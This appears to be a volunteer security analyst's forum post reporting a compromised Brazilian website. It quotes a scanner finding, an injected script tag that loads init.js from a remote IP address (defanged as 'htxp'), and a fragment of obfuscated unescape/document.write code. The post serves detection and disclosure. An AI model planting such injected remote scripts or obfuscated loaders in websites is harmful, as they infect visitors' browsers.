Site is blacklisted but not banned from Google Adsense Program: http://vnseo.com/http---galpaodoleite.com.br Flagged here: http://killmalware.com/galpaodoleite.com.br/
Script -
<script type='text/javascript' src='htxp://210.56.8.72/init.js'></script
Detected reference to blacklisted domain.
See: https://www.virustotal.com/nl/url/3e679fee2736bede9f0e0f26362204ef36945d500148a863f6c58d803f6fb960/analysis/1425769914/
210.56.8.72/init.js - Init.class exploits
modified the init.js and enabled usage of
dabble, added form.htm for vector
submission, modified the links in the
application.htm credits Mario Heiderich, see: https://code.google.com/p/xssdb/source/browse/trunk/scripts/init.js?r=11
Severity: Potentially Suspicious
Reason: Suspicious JavaScript code injection.
The web site contains a remote javascript or iframe that is currently blacklisted. That can be used to infect visitors of your own web site and generate cross-site warnings. If you don’t have access to the remote site, remove the link (or iframe or javascript) from your site pointing to it.
Details: Procedure [unescape] has been called with a hidden string ‘var l2=window.opera?1:0;function ac67f9cd(){if(dc9f76ca){document.write(’<scr’+‘ipt>’+lO+‘</sc’+‘rip’ containing execution of potentially suspicious code
[[unescape(mIq72MsKkBn3)]] -> decodingLevel=0] found JavaScript error: line:4: SyntaxError: missing ] after element list: error: line:4: [unescape(mIq72MsKkBn3) error: line:4: .......................^ file: 3d71220b830983551adf8532ccbc974432d4531e: 23 bytes* This expression returns neither a string, nor a function, it returns a collection. * pol IP badness: https://www.virustotal.com/nl/ip-address/177.19.155.150/information/ Additional insecurity: http://sameid.net/ip/177.19.155.150/2/ IP Abuse in the past: http://www.projecthoneypot.org/ip_177.19.155.150
polonus (volunteer website security analyst and website error-hunter)